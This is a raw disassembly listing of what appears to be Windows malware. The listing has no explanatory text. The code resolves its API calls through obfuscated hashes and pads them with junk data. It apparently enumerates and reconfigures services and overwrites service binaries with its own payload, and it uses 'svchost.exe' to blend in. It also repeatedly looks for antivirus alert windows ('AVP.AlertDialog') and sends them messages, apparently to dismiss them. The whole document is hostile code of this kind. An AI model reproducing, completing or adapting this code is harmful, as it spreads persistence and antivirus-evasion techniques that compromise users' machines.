dd 2D7E0012h, 9DDB0946h, 0B5C3662h, 0F7A57637h, 3D6187C2h
dd 0F49D5C11h, 592B4A29h, 73008FE0h, 0F395ACC3h
; ---------------------------------------------------------------------------
icebp
test [eax], eax ; DATA XREF: sub_401CBF+7B�o
; .text:00401E19�o
pop es
add [ecx+0], cl
std
xchg eax, ebx
mov esp, 34BBCFCFh
push ebp
sub dh, 0FAh
xchg eax, esi
loc_401CBB: ; DATA XREF: sub_401CBF+BE�o
; .text:00401E25�o
db 64h, 64h
xor al, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401CBF proc near ; CODE XREF: .text:0040241A�p
; .text:00402518�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
jmp short loc_401CCB
; ---------------------------------------------------------------------------
dword_401CC7 dd 1F513831h ; sub_401E5C+6B�r ...
; ---------------------------------------------------------------------------
loc_401CCB: ; CODE XREF: sub_401CBF+6�j
push 11h
push 40h
push ds:dword_401CC7
push offset byte_4017CD
call sub_4016EF
call eax
mov [ebp+var_8], eax
push 400h
push offset byte_41EABD
push offset byte_401C83
call sub_4015FD
jmp short loc_401CFE
; ---------------------------------------------------------------------------
dword_401CFA dd 0FF42948Bh ; .text:00401DF9�r ...
; ---------------------------------------------------------------------------
loc_401CFE: ; CODE XREF: sub_401CBF+39�j
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push offset byte_41EABD
push 80000002h
push ds:dword_401CFA
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jnz short loc_401DA6
mov [ebp+var_C], 11h
push 400h
push offset byte_41EABD
push (offset loc_401CA9+1)
call sub_4015FD
jmp short loc_401D4A
; ---------------------------------------------------------------------------
dword_401D46 dd 0BFC4180Ah ; sub_4026B0+CE�r ...
; ---------------------------------------------------------------------------
loc_401D4A: ; CODE XREF: sub_401CBF+85�j
lea eax, [ebp+var_C]
push eax
push [ebp+var_8]
push 0
push 0
push offset byte_41EABD
push [ebp+var_4]
push ds:dword_401D46
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jz short loc_401D7A
mov eax, 0
jmp short loc_401DAB
; ---------------------------------------------------------------------------
loc_401D7A: ; CODE XREF: sub_401CBF+B2�j
push [ebp+var_8]
push offset loc_401CBB
push ds:dword_401855
push offset byte_4017CD
call sub_4016EF
call eax
or eax, eax
jnz short loc_401D9F
mov eax, 1
jmp short loc_401DA4
; ---------------------------------------------------------------------------
loc_401D9F: ; CODE XREF: sub_401CBF+D7�j
mov eax, 0
loc_401DA4: ; CODE XREF: sub_401CBF+DE�j
jmp short loc_401DAB
; ---------------------------------------------------------------------------
loc_401DA6: ; CODE XREF: sub_401CBF+68�j
mov eax, 0
loc_401DAB: ; CODE XREF: sub_401CBF+B9�j
; sub_401CBF:loc_401DA4�j
push eax
jmp short loc_401DB2
; ---------------------------------------------------------------------------
dword_401DAE dd 4AD25820h ; ---------------------------------------------------------------------------
loc_401DB2: ; CODE XREF: sub_401CBF+ED�j
push [ebp+var_8]
push ds:dword_401DAE
push offset byte_4017CD
call sub_4016EF
call eax
pop eax
leave
retn
sub_401CBF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push 400h
push offset byte_41EABD
push offset byte_401C83
call sub_4015FD
lea eax, [ebp-4]
push eax
push 0F003Fh
push 0
push offset byte_41EABD
push 80000002h
push ds:dword_401CFA
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jnz short locret_401E48
push 400h
push offset byte_41EABD
push (offset loc_401CA9+1)
call sub_4015FD
push 11h
push offset loc_401CBB
push 1
push 0
push offset byte_41EABD
push dword ptr [ebp-4]
push ds:dword_401BC6
push offset byte_401B79
call sub_4016EF
call eax
locret_401E48: ; CODE XREF: .text:00401E0D�j
leave
retn
; ---------------------------------------------------------------------------
dw 600h
dd 700D5E00h, 0DA237029h, 9F094C8Eh, 498DD2h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E5C proc near ; CODE XREF: .text:004024C7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
jmp short loc_401E68
; ---------------------------------------------------------------------------
dword_401E64 dd 718E6C3Bh ; sub_401F9A+23�r ...
; ---------------------------------------------------------------------------
loc_401E68: ; CODE XREF: sub_401E5C+6�j
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
push ds:dword_401E64
push offset byte_4017CD
call sub_4016EF
call eax
cmp eax, 0FFFFFFFFh
jz loc_401F31
mov [ebp+var_4], eax
jmp short loc_401EA1
; ---------------------------------------------------------------------------
dword_401E9D dd 0C3B11EB1h ; sub_401F9A+46�r
; ---------------------------------------------------------------------------
loc_401EA1: ; CODE XREF: sub_401E5C+3F�j
push 0
push [ebp+var_4]
push ds:dword_401E9D
push offset byte_4017CD
call sub_4016EF
call eax
push eax
pop dword_41EF0C
push dword_41EF0C
push 40h
push ds:dword_401CC7
push offset byte_4017CD
call sub_4016EF
call eax
or eax, eax
jz short loc_401F2C
push eax
pop dword_41EF08
jmp short loc_401EEA
; ---------------------------------------------------------------------------
dword_401EE6 dd 5B70D13Ch ; sub_401F9A+85�r ...
; ---------------------------------------------------------------------------
loc_401EEA: ; CODE XREF: sub_401E5C+88�j
push 0
push offset dword_405000
push dword_41EF0C
push dword_41EF08
push [ebp+var_4]
push ds:dword_401EE6
push offset byte_4017CD
call sub_4016EF
call eax
push [ebp+var_4]
push ds:dword_401915
push offset byte_4017CD
call sub_4016EF
call eax
push 1
pop eax
jmp short locret_401F34
; ---------------------------------------------------------------------------
loc_401F2C: ; CODE XREF: sub_401E5C+7F�j
push 0
pop eax
jmp short locret_401F34
; ---------------------------------------------------------------------------
loc_401F31: ; CODE XREF: sub_401E5C+36�j
push 0
pop eax
locret_401F34: ; CODE XREF: sub_401E5C+CE�j
; sub_401E5C+D3�j
leave
retn 4
sub_401E5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F38 proc near ; CODE XREF: sub_401F9A+6�p
; .text:004022EF�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push 105h
push 40h
push ds:dword_401CC7
push offset byte_4017CD
call sub_4016EF
call eax
mov [ebp+var_4], eax
jmp short loc_401F60
; ---------------------------------------------------------------------------
dword_401F5C dd 2C70B0Ch ; ---------------------------------------------------------------------------
loc_401F60: ; CODE XREF: sub_401F38+22�j
push 0
push ds:dword_401F5C
push offset byte_4017CD
call sub_4016EF
call eax
jmp short loc_401F7A
; ---------------------------------------------------------------------------
dword_401F76 dd 0C097DCDh ; ---------------------------------------------------------------------------
loc_401F7A: ; CODE XREF: sub_401F38+3C�j
push 104h
push [ebp+var_4]
push eax
push ds:dword_401F76
push offset byte_4017CD
call sub_4016EF
call eax
mov eax, [ebp+var_4]
leave
retn
sub_401F38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F9A proc near ; CODE XREF: .text:004024D7�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
call sub_401F38
mov [ebp+var_8], eax
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+var_8]
push ds:dword_401E64
push offset byte_4017CD
call sub_4016EF
call eax
cmp eax, 0FFFFFFFFh
jz loc_4020B8
mov [ebp+var_4], eax
push 0
push [ebp+var_4]
push ds:dword_401E9D
push offset byte_4017CD
call sub_4016EF
call eax
mov [ebp+var_C], eax
push [ebp+var_C]
push 40h
push ds:dword_401CC7
push offset byte_4017CD
call sub_4016EF
call eax
mov [ebp+var_10], eax
push 0
push offset dword_405000
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push ds:dword_401EE6
push offset byte_4017CD
call sub_4016EF
call eax
push [ebp+var_4]
push ds:dword_401915
push offset byte_4017CD
call sub_4016EF
call eax
push 0
push 80h
push 5
push 0
push 3
push 0C0000000h
push [ebp+arg_0]
push ds:dword_401E64
push offset byte_4017CD
call sub_4016EF
call eax
or eax, eax
jz short loc_4020B3
mov [ebp+var_4], eax
jmp short loc_40207A
; ---------------------------------------------------------------------------
dword_402076 dd 5004DC90h ; sub_4020C1+4B�r
; ---------------------------------------------------------------------------
loc_40207A: ; CODE XREF: sub_401F9A+DA�j
push 0
push offset dword_405000
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push ds:dword_402076
push offset byte_4017CD
call sub_4016EF
call eax
push [ebp+var_4]
push ds:dword_401915
push offset byte_4017CD
call sub_4016EF
call eax
jmp short locret_4020BD
; ---------------------------------------------------------------------------
loc_4020B3: ; CODE XREF: sub_401F9A+D5�j
push 0
pop eax
jmp short locret_4020BD
; ---------------------------------------------------------------------------
loc_4020B8: ; CODE XREF: sub_401F9A+38�j
mov eax, 0
locret_4020BD: ; CODE XREF: sub_401F9A+117�j
; sub_401F9A+11C�j
leave
retn 4
sub_401F9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020C1 proc near ; CODE XREF: .text:0040252D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push 0
push 80h
push 5
push 0
push 3
push 40000000h
push [ebp+arg_0]
push ds:dword_401E64
push offset byte_4017CD
call sub_4016EF
call eax
cmp eax, 0FFFFFFFFh
jz short loc_402138
mov [ebp+var_4], eax
push 0
push offset dword_405000
push dword_41EF0C
push dword_41EF08
push [ebp+var_4]
push ds:dword_402076
push offset byte_4017CD
call sub_4016EF
call eax
push [ebp+var_4]
push ds:dword_401915
push offset byte_4017CD
call sub_4016EF
call eax
push 1
pop eax
jmp short locret_40213D
; ---------------------------------------------------------------------------
loc_402138: ; CODE XREF: sub_4020C1+30�j
mov eax, 0
locret_40213D: ; CODE XREF: sub_4020C1+75�j
leave
retn 4
sub_4020C1 endp
; =============== S U B R O U T I N E =======================================
sub_402141 proc near ; CODE XREF: .text:004022EA�p
; .text:0040246C�p
jmp short loc_402147
; ---------------------------------------------------------------------------
dword_402143 dd 0D4D4A052h ; sub_402141+60�r
; ---------------------------------------------------------------------------
loc_402147: ; CODE XREF: sub_402141�j
push offset dword_405000
push 4
push offset dword_41EEDC
push dword_41EED8
push ds:dword_402143
push offset byte_401B79
call sub_4016EF
call eax
push ds:dword_405000
push 40h
push ds:dword_401CC7
push offset byte_4017CD
call sub_4016EF
call eax
mov dword_41EEDC, eax
push offset dword_405000
push ds:dword_405000
push dword_41EEDC
push dword_41EED8
push ds:dword_402143
push offset byte_401B79
call sub_4016EF
call eax
push dword_41EEDC
pop edi
mov eax, [edi+0Ch]
push eax
pop dword_41EEE4
mov eax, [edi]
push eax
pop dword_41EF04
retn
sub_402141 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
jmp short loc_4021DA
; ---------------------------------------------------------------------------
dword_4021D6 dd 698C5AB5h ; ---------------------------------------------------------------------------
loc_4021DA: ; CODE XREF: .text:004021D4�j
push 4
push 0
push 0
push ds:dword_4021D6
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jz locret_402572
mov dword_41EEC0, eax
jmp short loc_402205
; ---------------------------------------------------------------------------
dword_402201 dd 0E2949E0Eh ; .text:00402277�r
; ---------------------------------------------------------------------------
loc_402205: ; CODE XREF: .text:004021FF�j
push 0
push offset dword_41EECC
push offset dword_41EEC8
push 4
push offset dword_41EEC4
push 3
push 30h
push dword_41EEC0
push ds:dword_402201
push offset byte_401B79
call sub_4016EF
call eax
push dword_41EEC8
push 40h
push ds:dword_401CC7
push offset byte_4017CD
call sub_4016EF
call eax
push eax
pop dword_41EEC4
push 0
push offset dword_41EECC
push offset dword_41EEC8
push dword_41EEC8
push dword_41EEC4
push 3
push 30h
push dword_41EEC0
push ds:dword_402201
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jz loc_402554
push dword_41EEC4
pop edi
push dword_41EECC
pop ecx
loc_40229F: ; CODE XREF: .text:0040254E�j
push edi
push ecx
mov eax, [edi]
push eax
pop dword_41EED0
mov eax, [edi+4]
push eax
pop dword_41EED4
jmp short loc_4022BA
; ---------------------------------------------------------------------------
dword_4022B6 dd 0DB16F923h ; .text:0040244D�r
; ---------------------------------------------------------------------------
loc_4022BA: ; CODE XREF: .text:004022B4�j
push 0F01FFh
push dword_41EED0
push dword_41EEC0
push ds:dword_4022B6
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jz loc_40243F
mov dword_41EED8, eax
call sub_402141
call sub_401F38
mov [ebp-4], eax
jmp short loc_4022FD
; ---------------------------------------------------------------------------
dword_4022F9 dd 0B0EAD59h ; .text:004023F1�r
; ---------------------------------------------------------------------------
loc_4022FD: ; CODE XREF: .text:004022F7�j
push dword_41EED0
push 0
push 0
push 0
push 0
push 0
push dword ptr [ebp-4]
push 0FFFFFFFFh
push 0FFFFFFFFh
push 110h
push dword_41EED8
push ds:dword_4022F9
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jz loc_40243F
jmp short loc_40233F
; ---------------------------------------------------------------------------
dword_40233B dd 0C6440C9Bh ; ---------------------------------------------------------------------------
loc_40233F: ; CODE XREF: .text:00402339�j
push offset dword_41EEE8
push 1
push dword_41EED8
push ds:dword_40233B
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jz short loc_4023A3
loc_402362: ; CODE XREF: .text:004023A1�j
push 0Ah
push ds:dword_401AFD
push offset byte_4017CD
call sub_4016EF
call eax
jmp short loc_40237C
; ---------------------------------------------------------------------------
dword_402378 dd 0D103437Bh ; ---------------------------------------------------------------------------
loc_40237C: ; CODE XREF: .text:00402376�j
push offset dword_41EEE8
push dword_41EED8
push ds:dword_402378
push offset byte_401B79
call sub_4016EF
call eax
mov eax, dword_41EEEC
cmp eax, 1
jnz short loc_402362
loc_4023A3: ; CODE XREF: .text:00402360�j
jmp short loc_4023A9
; ---------------------------------------------------------------------------
dword_4023A5 dd 0BFC675E1h ; .text:004024EB�r
; ---------------------------------------------------------------------------
loc_4023A9: ; CODE XREF: .text:loc_4023A3�j
push 0
push 0
push dword_41EED8
push ds:dword_4023A5
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jz short loc_4023CB
jmp short loc_40243F
; ---------------------------------------------------------------------------
loc_4023CB: ; CODE XREF: .text:004023C7�j
push dword_41EED0
push 0
push 0
push 0
push 0
push 0
push dword_41EEE4
push 0FFFFFFFFh
push 0FFFFFFFFh
push dword_41EF04
push dword_41EED8
push ds:dword_4022F9
push offset byte_401B79
call sub_4016EF
call eax
push 9C4h
push ds:dword_401AFD
push offset byte_4017CD
call sub_4016EF
call eax
call sub_401CBF
or eax, eax
jnz short loc_402425
jmp short loc_40243F
; ---------------------------------------------------------------------------
loc_402425: ; CODE XREF: .text:00402421�j
jmp short loc_40242B
; ---------------------------------------------------------------------------
dword_402427 dd 10A0059Fh ; .text:00402534�r
; ---------------------------------------------------------------------------
loc_40242B: ; CODE XREF: .text:loc_402425�j
push 0
push ds:dword_402427
push offset byte_4017CD
call sub_4016EF
call eax
loc_40243F: ; CODE XREF: .text:004022DF�j
; .text:00402333�j ...
push 15h
push dword_41EED0
push dword_41EEC0
push ds:dword_4022B6
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jz loc_402546
mov dword_41EED8, eax
call sub_402141
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push dword_41EEE4
push ds:dword_401E64
push offset byte_4017CD
call sub_4016EF
call eax
cmp eax, 0FFFFFFFFh
jz loc_402546
mov dword_41EEE0, eax
push dword_41EEE0
push ds:dword_401915
push offset byte_4017CD
call sub_4016EF
call eax
push dword_41EEE4
call sub_401E5C
cmp eax, 1
jnz short loc_402546
push dword_41EEE4
call sub_401F9A
cmp eax, 1
jnz short loc_402546
push 0
push 0
push dword_41EED8
push ds:dword_4023A5
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jnz short loc_402525
push 0FAh
push ds:dword_401AFD
push offset byte_4017CD
call sub_4016EF
call eax
call sub_401CBF
or eax, eax
jnz short loc_402527
jmp short loc_402546
; ---------------------------------------------------------------------------
jmp short loc_402527
; ---------------------------------------------------------------------------
loc_402525: ; CODE XREF: .text:004024FF�j
jmp short loc_402546
; ---------------------------------------------------------------------------
loc_402527: ; CODE XREF: .text:0040251F�j
; .text:00402523�j
push dword_41EEE4
call sub_4020C1
push 0
push ds:dword_402427
push offset byte_4017CD
call sub_4016EF
call eax
loc_402546: ; CODE XREF: .text:00402461�j
; .text:0040249E�j ...
pop ecx
pop edi
add edi, 24h
dec ecx
or ecx, ecx
jnz loc_40229F
loc_402554: ; CODE XREF: .text:0040228B�j
jmp short loc_40255A
; ---------------------------------------------------------------------------
dword_402556 dd 0F2CBBE3h ; ---------------------------------------------------------------------------
loc_40255A: ; CODE XREF: .text:loc_402554�j
push dword_41EEC0
push ds:dword_402556
push offset byte_401B79
call sub_4016EF
call eax
locret_402572: ; CODE XREF: .text:004021F4�j
leave
retn
; ---------------------------------------------------------------------------
dword_402574 dd 5F3ACBEDh, 37000B00h, 5D097A5Ah, 0F3B9DC34h, 4BD3B68Bh
; DATA XREF: .text:00402A35�r
; .text:00402B1A�r
dd 0DA715F28h, 999CE4BFh, 700FCh, 4966C4E4h, 0D630372h
dd 7A55D6F6h, 0F00730Bh, 61470600h, 9BF3A337h, 315C1DB5h
dd 4EEF8A5Dh, 0B2F0843Ch, 91E188F6h, 713B57F0h, 3F581Eh
dd 4E0F0018h, 6939A5F3h, 0E4B4D8F6h, 781781F3h, 0D9ACFA9Eh
dd 21555033h, 2A6492CDh, 0F581A0CFh, 0E187573Eh, 5664D24h
dd 75018CEDh, 7F10A4CDh
; ---------------------------------------------------------------------------
pop ss
jns short $+2 ; DATA XREF: sub_4026B0+3�o
; sub_402859+E�o
xor eax, [eax]
jmp fword ptr [esi+378ACCE9h]
; ---------------------------------------------------------------------------
dd 0CBBCEB63h, 977258Ah, 992F734Ch, 898EE7D4h, 0ABF082EAh
dd 0F36D1EC4h, 0DD23459Ch, 0C44A16A9h, 4B4F2693h, 0B7385C25h
dd 52A4D3D8h, 0C8E7BB21h, 8D4D388Bh, 343240FFh, 0D8117F51h
dd 766335ACh, 4F641613h, 4A41283Ch, 4FC6A825h, 0ACB1E413h
dd 724821C2h, 0D806751Ch, 97CCADACh
db 0FBh, 28h, 44h
db 0 ; DATA XREF: sub_4026B0+A8�o
dd 1E4B000Dh, 9BD7EBB9h, 0B0C0DD88h, 0F19094F0h, 56331561h
dd 325C773Eh, 8EE1D9BFh
dd 0CF000600h, 0EF6919BCh, 1036448Ah ; DATA XREF: sub_4026B0+E8�o
db 63h, 0E3h, 88h
db 0 ; DATA XREF: sub_4026B0+115�o
dd 2E7B000Fh, 0C5AC741Ah, 42317A14h, 0EE8F2B5Fh, 711D264Ah
dd 92E61E4Dh, 0E0891260h, 7C1B0C62h
; ---------------------------------------------------------------------------
loc_4026AC: ; DATA XREF: sub_4026B0:loc_4026DF�o
pop esp
add [ebx+0], bh ; DATA XREF: sub_4026B0+156�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4026B0 proc near ; CODE XREF: sub_402859+96�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push (offset loc_4025F5+1)
call sub_40166A
push offset aSvchost_exe ; "svchost.exe "
push offset byte_41F415
push ds:dword_401B4D
push offset byte_4017CD
call sub_4016EF
call eax
jmp short loc_4026DF
; ---------------------------------------------------------------------------
dword_4026DB dd 0F3FF40D6h ; sub_4026B0+53�r ...
; ---------------------------------------------------------------------------
loc_4026DF: ; CODE XREF: sub_4026B0+29�j
push offset loc_4026AC
push offset byte_41F415
push ds:dword_4026DB
push offset byte_4017CD
call sub_4016EF
call eax
push [ebp+arg_0]
push offset byte_41F415
push ds:dword_4026DB
push offset byte_4017CD
call sub_4016EF
call eax
push offset dword_41FD45
push 20019h
push 0
push offset byte_41F415
push 80000002h
push ds:dword_401CFA
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jnz loc_40283D
push 400h
pop dword_41FF49
push 1
pop dword_41FF4D
push offset byte_40265F
call sub_40166A
push offset dword_41FF49
push offset byte_41F415
push offset dword_41FF4D
push 0
push offset aSvchost_exe ; "svchost.exe "
push dword_41FD45
push ds:dword_401D46
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jnz loc_40283D
push offset dword_40267C
call sub_40166A
push offset byte_41F415
push offset aSvchost_exe ; "svchost.exe "
call sub_4017C8
cmp eax, 0
jbe loc_40283D
push 200h
pop dword_41FF49
push offset byte_40268B
call sub_40166A
push offset dword_41FF49
push offset byte_41F415
push offset dword_41FF4D
push 0
push offset aSvchost_exe ; "svchost.exe "
push dword_41FD45
push ds:dword_401D46
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jnz short loc_40283D
push offset byte_41F415
push (offset loc_4026AD+1)
call sub_4017C8
cmp eax, 0
jbe short loc_40283D
add eax, offset byte_41F415
dec eax
push 64h
push eax
push offset byte_41FC15
push ds:dword_40182F
push offset byte_4017CD
call sub_4016EF
call eax
push 1
pop dword_41FF51
loc_40283D: ; CODE XREF: sub_4026B0+8F�j
; sub_4026B0+E2�j ...
push dword_41FD45
push ds:dword_401915
push offset byte_4017CD
call sub_4016EF
call eax
leave
retn 4
sub_4026B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402859 proc near ; CODE XREF: .text:00402A4D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push 0
pop dword_41FF51
push (offset loc_4025F5+1)
call sub_40166A
push offset dword_41FD41
push 20019h
push 0
push offset aSvchost_exe ; "svchost.exe "
push 80000002h
push ds:dword_401CFA
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jnz short loc_4028FA
push 0
pop [ebp+var_4]
loc_4028A2: ; CODE XREF: sub_402859+9F�j
push 200h
pop dword_41FF49
jmp short loc_4028B3
; ---------------------------------------------------------------------------
dword_4028AF dd 0A85917Dh ; ---------------------------------------------------------------------------
loc_4028B3: ; CODE XREF: sub_402859+54�j
push 0
push 0
push 0
push 0
push offset dword_41FF49
push offset byte_41FD49
push [ebp+var_4]
push dword_41FD41
push ds:dword_4028AF
push offset byte_401B79
call sub_4016EF
call eax
mov [ebp+var_8], eax
or eax, eax
jnz short loc_4028F4
inc [ebp+var_4]
push offset byte_41FD49
call sub_4026B0
loc_4028F4: ; CODE XREF: sub_402859+8C�j
cmp [ebp+var_8], 0
jz short loc_4028A2
loc_4028FA: ; CODE XREF: sub_402859+42�j
push dword_41FD41
push ds:dword_401915
push offset byte_4017CD
call sub_4016EF
call eax
leave
retn
sub_402859 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402914 proc near ; DATA XREF: .text:004029B3�o
; .text:004029DD�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
jmp short loc_402922
; ---------------------------------------------------------------------------
byte_402919 db 0, 8Eh, 6 ; DATA XREF: sub_402914+27�o
; sub_402914+71�o ...
dd 0D18D49FBh
db 0BDh, 8
; ---------------------------------------------------------------------------
loc_402922: ; CODE XREF: sub_402914+3�j
jmp short loc_402928
; ---------------------------------------------------------------------------
dword_402924 dd 0A94F24Bh ; ---------------------------------------------------------------------------
loc_402928: ; CODE XREF: sub_402914:loc_402922�j
push 400h
push offset aVmdragdetectwn ; "VMDragDetectWndClass"
push [ebp+arg_0]
push ds:dword_402924
push offset byte_402919
call sub_4016EF
call eax
jmp short loc_40294D
; ---------------------------------------------------------------------------
dword_402949 dd 0F90307BEh ; ---------------------------------------------------------------------------
loc_40294D: ; CODE XREF: sub_402914+33�j
push offset aAvp_alertdialo ; "AVP.AlertDialog"
push offset aVmdragdetectwn ; "VMDragDetectWndClass"
push ds:dword_402949
push offset byte_4017CD
call sub_4016EF
call eax
or eax, eax
jnz short loc_402991
jmp short loc_402973
; ---------------------------------------------------------------------------
dword_40296F dd 0D277AE02h ; ---------------------------------------------------------------------------
loc_402973: ; CODE XREF: sub_402914+59�j
push 0
push 0
push 82h
push [ebp+arg_0]
push ds:dword_40296F
push offset byte_402919
call sub_4016EF
call eax
loc_402991: ; CODE XREF: sub_402914+57�j
mov eax, 1
leave
retn 8
sub_402914 endp
; ---------------------------------------------------------------------------
loc_40299A: ; CODE XREF: .text:00402A08�j
; DATA XREF: .text:00402A1A�o
push 64h
push offset aAvp_alertdialo ; "AVP.AlertDialog"
push 4025A2h
call sub_4015FD
jmp short loc_4029B1
; ---------------------------------------------------------------------------
dword_4029AD dd 0D34B44ECh ; .text:004029E2�r
; ---------------------------------------------------------------------------
loc_4029B1: ; CODE XREF: .text:004029AB�j
push 0
push offset sub_402914
push ds:dword_4029AD
push offset byte_402919
call sub_4016EF
call eax
push 64h
push offset aAvp_alertdialo ; "AVP.AlertDialog"
push 4025C3h
call sub_4015FD
push 0
push offset sub_402914
push ds:dword_4029AD
push offset byte_402919
call sub_4016EF
call eax
push 32h
push ds:dword_401AFD
push offset byte_4017CD
call sub_4016EF
call eax
jmp short loc_40299A
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
jmp short loc_402A11
; ---------------------------------------------------------------------------
dword_402A0D dd 0EDD013h ; ---------------------------------------------------------------------------
loc_402A11: ; CODE XREF: .text:00402A0B�j
push offset dword_41FF4D
push 0
push 0
push offset loc_40299A
push 0
push 0
push ds:dword_402A0D
push offset byte_4017CD
call sub_4016EF
call eax
mov eax, ds:dword_402574
xor eax, 0BCh
push eax
call sub_4018A3
or eax, eax
jz locret_402BA6
call sub_402859
cmp dword_41FF51, 1
jnz locret_402BA6
push 402578h
call sub_40166A
push offset aSvchost_exe ; "svchost.exe "
push offset byte_41F415
push ds:dword_401B4D
push offset byte_4017CD
call sub_4016EF
call eax
push 402591h
call sub_40166A
push offset aSvchost_exe ; "svchost.exe "
push offset byte_41F415
push ds:dword_4026DB
push offset byte_4017CD
call sub_4016EF
call eax
push offset byte_41FC15
push offset byte_41F415
push ds:dword_4026DB
push offset byte_4017CD
call sub_4016EF
call eax
mov dword_41FF55, 44h
jmp short loc_402AD7
; ---------------------------------------------------------------------------
dword_402AD3 dd 0C90C36C0h ; ---------------------------------------------------------------------------
loc_402AD7: ; CODE XREF: .text:00402AD1�j
push offset byte_41FF99
push offset dword_41FF55
push 0
push 0
push 0
push 0
push 0
push 0
push offset byte_41F415
push 0
push ds:dword_402AD3
push offset byte_4017CD
call sub_4016EF
call eax
loc_402B06: ; CODE XREF: .text:00402B2C�j
push 2
push ds:dword_401AFD
push offset byte_4017CD
call sub_4016EF
call eax
push ds:dword_402574
pop eax
xor eax, 7Ah
push eax
call sub_4018A3
or eax, eax
jnz short loc_402B06
loc_402B2E: ; CODE XREF: .text:00402BA4�j
push 402578h
call sub_40166A
push offset aSvchost_exe ; "svchost.exe "
call sub_40102D
push eax
call sub_4018A3
push eax
push 0
push 1
push ds:dword_401C47
push offset byte_4017CD
call sub_4016EF
call eax
push 0
push eax
push ds:dword_401C69
push offset byte_4017CD
call sub_4016EF
call eax
push 2
push ds:dword_401AFD
push offset byte_4017CD
call sub_4016EF
call eax
push 402578h
call sub_40166A
push offset aSvchost_exe ; "svchost.exe "
call sub_40102D
push eax
call sub_4018A3
or eax, eax
jnz short loc_402B2E
locret_402BA6: ; CODE XREF: .text:00402A47�j
; .text:00402A59�j
retn
; ---------------------------------------------------------------------------
align 4
dd 97DA0008h, 4C1FE487h, 0E980137Bh, 0A3CF8FEAh, 3F68C5A1h
dd 6A000F00h, 0FF006A00h, 4021D635h, 1B796800h, 1CE80040h
dd 0FFFFFFEBh, 0FC00BD0h, 9084h, 0EED8A300h, 0A7680041h
dd 0E800402Bh, 0FFFFEA7Eh, 1FF6890h, 4268000Fh, 0FF004058h
dd 41EED835h, 0B635FF00h, 68004022h, 401B79h, 0FFEAE2E8h
dd 0BD0FFFFh, 0A34274C0h, 41FFA9h, 41FFAD68h, 0FF016A00h
dd 41FFA935h, 3B35FF00h, 68004023h, 401B79h, 0FFEABAE8h
dd 0EBD0FFFFh, 79F1CD04h, 0A935FFE1h, 0FF0041FFh, 402C3935h
dd 1B796800h, 9CE80040h, 0FFFFFFEAh, 0D835FFD0h, 0FF0041EEh
dd 40255635h, 1B796800h, 84E80040h, 0FFFFFFEAh
; ---------------------------------------------------------------------------
rol bl, 1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C6E proc near ; CODE XREF: sub_402CA8+4B�p
; sub_402CA8+A6�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
pusha
mov edi, [ebp+arg_0]
mov ebx, 0
mov ecx, 0
mov eax, [ebp+arg_4]
loc_402C85: ; CODE XREF: sub_402C6E+2D�j
xor cl, [edi]
xor bl, [edi]
jmp short loc_402C8E
; ---------------------------------------------------------------------------
loc_402C8B: ; CODE XREF: sub_402C6E+23�j
sub cl, 20h
loc_402C8E: ; CODE XREF: sub_402C6E+1B�j
cmp cl, 20h
jnb short loc_402C8B
rol ebx, cl
inc edi
mov dl, [edi]
dec eax
or eax, eax
jnz short loc_402C85
mov [ebp+var_4], ebx
popa
mov eax, [ebp+var_4]
leave
retn 8
sub_402C6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CA8 proc near ; CODE XREF: .text:00402ED5�p
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
